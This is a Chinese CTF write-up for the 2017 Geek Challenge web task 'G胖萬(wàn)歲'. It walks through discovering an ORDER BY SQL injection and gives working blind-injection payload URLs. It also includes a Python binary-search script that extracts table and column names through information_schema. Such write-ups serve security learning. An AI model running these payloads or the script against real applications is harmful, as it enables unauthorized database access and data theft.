[極客大挑戰(zhàn)2017](Web)G胖萬(wàn)歲

題目鏈接 : http://game.sycsec.com:2008/Steam/1.php?type=DESC

image.png

看到 URL 中的 DESC 參數(shù)聯(lián)想到 SQL 語(yǔ)句中的 Order By 語(yǔ)法
姑且認(rèn)為是 MySQL
查了一下 MySQL 的語(yǔ)法 :

https://dev.mysql.com/doc/refman/5.7/en/sorting-rows.html
https://dev.mysql.com/doc/refman/5.7/en/order-by-optimization.html

select username, password from users order by username desc
image.png

嘗試測(cè)試 :

select username, password from users order by password, username desc
http://game.sycsec.com:2008/Steam/1.php?type=ASC

發(fā)現(xiàn)兩者返回順序不同
應(yīng)該就是這里的注入點(diǎn)了

%YI3YPL9GH(GCU%}RQG75VO.png

![](9RQ%0TGP.png](http://upload-images.jianshu.io/upload_images/2355077-fa3aac873238760d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

image.png

還是沒有深入閱讀 MySQL 的文檔 , 太菜了 , Order By 只能用于 union 之后

那么應(yīng)該是只能盲注了 , 盲注需要構(gòu)造一個(gè)可控的 Boolean
參考文章 :

http://www.cnblogs.com/REscan/p/6884278.html

image.png
http://game.sycsec.com:2008/Steam/1.php?type=,1%23 # 返回正常
http://game.sycsec.com:2008/Steam/1.php?type=,0%23 # SQL 執(zhí)行出錯(cuò)

http://game.sycsec.com:2008/Steam/1.php?type=,user%23 # 返回空 , 說(shuō)明列名不存在
http://game.sycsec.com:2008/Steam/1.php?type=,username%23 # 返回空 , 說(shuō)明列名不存在
http://game.sycsec.com:2008/Steam/1.php?type=,score%23 # 返回正常 , 列名存在

找到一個(gè)可用 Payload :

http://game.sycsec.com:2008/Steam/1.php?type=,(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)%3C0x55,1,0x00))%23

(select 1 regexp if(1,1,0x00))
(select 1 regexp if(1,1,0))

測(cè)試了一個(gè)小時(shí) , 就是找不到什么上面的 Payload 可以而下面的不行 , 想要罵娘了, *&()^#@()!)&S

腳本 :

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests

def check(content):
    return "Terraria" in content

def guess(url):
    response = requests.get(url)
    content = response.content
    return check(content)

data = ""
for i in range(0x20):
    LEFT = 0x00
    RIGHT = 0x100
    P = (RIGHT + LEFT) / 2
    while RIGHT - LEFT > 1:
        url = "http://game.sycsec.com:2008/Steam/1.php?type=,(select 1 regexp if(ascii(substring((select concat(table_name)from information_schema.tables where table_schema%3ddatabase() limit 0,1),"+str(i)+",1))%3c"+hex(P)+",1,0x00))%23"
        print "[+] Payload : %s" % (url)
        print "[%d]>>>>[%d]<<<<[%d]" % (LEFT, P, RIGHT)
        if guess(url):
            RIGHT = P
        else:
            LEFT = P
        P = (RIGHT + LEFT) / 2
    data += chr(P)
    print "[+] Data : %s" % (data)

[+] Tables : F1AG_1S_H3RE,GAMES
[+] Columns : ID,F14G_IS,ID,NAME,TIMES,SCORE,ACHIEVEMENT,PRICE

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

推薦閱讀更多精彩內(nèi)容